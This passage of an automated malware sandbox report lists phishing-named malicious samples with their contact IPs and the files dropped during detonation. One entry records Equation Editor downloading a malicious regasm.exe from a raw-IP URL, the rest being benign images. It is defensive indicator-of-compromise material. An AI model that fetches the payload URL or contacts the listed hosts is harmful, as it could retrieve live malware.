	SecuriteInfo.com.Variant.MSILHeracles.18248.31707.exe	Get hash	malicious	Browse	63.141.228.141
	TNT Shipment Documents.exe	Get hash	malicious	Browse	63.141.228.141
	QUOTE 1B001.exe	Get hash	malicious	Browse	63.141.228.141
	DOC.022000109530000.pdf.exe	Get hash	malicious	Browse	63.141.228.141
	detalles de la transferencia.pdf.exe	Get hash	malicious	Browse	63.141.228.141
	XpQz54zQrMpkJxs.exe	Get hash	malicious	Browse	63.141.228.141
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	Seafood Order and Company Profile.xlsx	Get hash	malicious	Browse	103.133.109.192
	RFQ.exe	Get hash	malicious	Browse	103.140.250.132
	NEW ORDER.xlsx	Get hash	malicious	Browse	103.140.251.225
	Purchase Contract.jar	Get hash	malicious	Browse	103.133.104.124
	Booking.pdf.exe	Get hash	malicious	Browse	103.140.250.132
	DHL_June 2021 at 11M_9BZ7290_PDF.exe	Get hash	malicious	Browse	103.133.109.176
	Spec Design.exe	Get hash	malicious	Browse	180.214.238.96
	YEj2a2f6ai.exe	Get hash	malicious	Browse	103.114.104.219
	Purchase Contract.jar	Get hash	malicious	Browse	103.133.104.124
	M113461.exe	Get hash	malicious	Browse	103.89.91.38
	Draft HUD.jar	Get hash	malicious	Browse	103.133.104.124
	MV SHUHA QUEEN.docx	Get hash	malicious	Browse	103.133.106.72
	MV SHUHA QUEEN.docx	Get hash	malicious	Browse	103.133.106.72
	8KfPvyojv5.exe	Get hash	malicious	Browse	103.149.13.196
	vpUOv3498p.exe	Get hash	malicious	Browse	103.133.109.176
	9n7miZydYC.exe	Get hash	malicious	Browse	103.133.106.117
	NEW ORDER Ref PO-298721.doc	Get hash	malicious	Browse	103.133.106.117
	2-2.exe	Get hash	malicious	Browse	103.114.107.28
	3-1.exe	Get hash	malicious	Browse	103.114.107.28
	2-3.exe	Get hash	malicious	Browse	103.114.107.28

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	761856
Entropy (8bit):	7.601403838460658
Encrypted:	false
SSDEEP:	12288:88zqLMOeSMxvquwaHpCwQqc6n2R8Uncvc6t8TSx+f5SSruwsr4Z4:zOgfquPHpCwQqRTTt88KSKNsrJ
MD5:	7146B0D2CAED6422C289A08F63A5C685
SHA1:	2666D058EA4E4A2CA5BC6E5EA75594E68FC63F1B
SHA-256:	25AA6393CACFF94544387CC515F754DFD2AF133612A74FD84B64C6E17354D1ED
SHA-512:	F0B3098F20A22095397AB88348ECFE0911B126739005C9B70A815543BE04465603D3ED0C070BA50488C88FE13B9470D003C114254941593BA20F4511CB01CC47
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Reputation:	low
IE Cache URL:	http://103.89.90.94/pzldoc/regasm.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J.`................................ ........@.. ....................................@.....................................K.......,...........................?................................................ ............... ..H............text....... ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........&..h...........P,.............................................j+.&.(....(....(.....o......0..........+.&.+.&. .....9S...&..(....8....& ....8;.....(.... ....8.....(.... ....8......(....8.... ............E................................/... ....(....:....&..(.....(....9s...& .....9....&.V+.&..(....(....(......V+.&..(....o#...(.......+.&....+.&...J+.&.........(.....J+.&.........(.....J+.&.........(.....J+.&.........(......+.&..(....:+.&.....o!...*.J+.&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1AE5E43D.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	50311
Entropy (8bit):	7.960958863022709
Encrypted:	false
SSDEEP:	768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
MD5:	4141C7515CE64FED13BE6D2BA33299AA
SHA1:	B290F533537A734B7030CE1269AC8C5398754194
SHA-256:	F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
SHA-512:	74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..\|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..\|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.\|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\32420706.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4091E51A.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5A2D31B2.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	51166
Entropy (8bit):	7.767050944061069
Encrypted:	false
SSDEEP:	1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
MD5:	8C29CF033A1357A8DE6BF1FC4D0B2354
SHA1:	85B228BBC80DC60D40F4D3473E10B742E7B9039E
SHA-256:	E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
SHA-512:	F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...\|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\63F24961.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7592
Entropy (8bit):	5.455885888544303
Encrypted:	false
SSDEEP:	96:znp5cqblJaXn/08pnDp0d7vilxL01/G37uVH1oL6lcQtoVhZxGOme3SBwO:bp2STxK/LA/FVoL3QtKhn+e3+wO
MD5:	F90940F79806885D4D1066FF87C79506
SHA1:	4292293781E28C72F1BD8D888A87E99F70EABFB3
SHA-256:	0BC0CE96702BEBFC824C0957DDB9193BA5AC80E7D9600F73DA1F055401D77EBF
SHA-512:	5B2D5FABEDDEAE601F9EADAE8D0AC88255111ADF3B9E53C9B6CC45CFE1B042ED14E7942C82A440EEA85F9B11E27FBD930FB934505EC8E26DB78B182296196E6A
Malicious:	false
Preview:	....l...(.......e...<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................=.6.).X.......d..........................'.q....\.............L..W.q........6Ov_.q......qX.=.Dy.w.P4...............w..4.$.......d..........J^.q.... ^.qHB4..P4.8^......-...4...<.w................<..v.Zfv....X..o....X.=.......................gvdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6BC1535.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	79394
Entropy (8bit):	7.864111100215953
Encrypted:	false
SSDEEP:	1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5:	16925690E9B366EA60B610F517789AF1
SHA1:	9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256:	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512:	AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious:	false
Preview:	.PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..MA..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z._....\|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}\|.._...>r.v~..G..)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..\|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\79991ED9.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\826EFC38.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	51166
Entropy (8bit):	7.767050944061069
Encrypted:	false
SSDEEP:	1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
MD5:	8C29CF033A1357A8DE6BF1FC4D0B2354
SHA1:	85B228BBC80DC60D40F4D3473E10B742E7B9039E
SHA-256:	E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
SHA-512:	F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
Malicious:	false
Preview:	.PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...\|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8BBCBF4F.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	50311
Entropy (8bit):	7.960958863022709
Encrypted:	false
SSDEEP:	768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
MD5:	4141C7515CE64FED13BE6D2BA33299AA
SHA1:	B290F533537A734B7030CE1269AC8C5398754194
SHA-256:	F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
SHA-512:	74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
Malicious:	false
Preview:	.PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..\|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..\|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.\|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6AB76E0.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	648132
Entropy (8bit):	2.8124530118203914
Encrypted:	false
SSDEEP:	3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
MD5:	955A9E08DFD3A0E31C7BCF66F9519FFC
SHA1:	F677467423105ACF39B76CB366F08152527052B3
SHA-256:	08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
SHA-512:	39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
Malicious:	false
Preview:	....l...........................Q>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................V$.....o..f.V.@o.%.....o...o.....L.o...o.RQAXL.o.D.o.......o.0.o.$QAXL.o.D.o. ...Id.VD.o.L.o. ............d.V........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............o.X...D.o.x.o..8.V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C7035FEE.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7608
Entropy (8bit):	5.085491918831368
Encrypted:	false
SSDEEP:	96:+Sp5LSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5pW+sW31RGtdVDYM3VfmkpH
MD5:	332C0E448848C1DCFAC18AAA237E2151
SHA1:	319D4EBF0024ED92F0424C6BF949EACD22236441
SHA-256:	F1CB1DBD79CC21483BBCD58E689B95C4F0EDACEDD6F1E3239F655C6529718682
SHA-512:	8607DFBDF76369D68CAD592CCFB79FFA55FFD472E83B2D30D9AF9B5B56E8D2B5E2964EF885090A2ABA02310EC425D0617BC2D7BCEB1E70715095F507F6512DAD
Malicious:	false
Preview:	....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................=.6.).X.......d..........................'.q....\.............L..W.q........6Ov_.q......qX.=.Dy.w.P4...............w..4.$.......d..........J^.q.... ^.qHB4..P4.8^......-...4...<.w................<..v.Zfv....X..o....X.=.......................gvdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C83AFE53.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	79394
Entropy (8bit):	7.864111100215953
Encrypted:	false
SSDEEP:	1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5:	16925690E9B366EA60B610F517789AF1
SHA1:	9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256:	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512:	AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious:	false
Preview:	.PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..MA..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z._....\|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}\|.._...>r.v~..G..)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..\|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D1A2B317.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F5DD422C.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
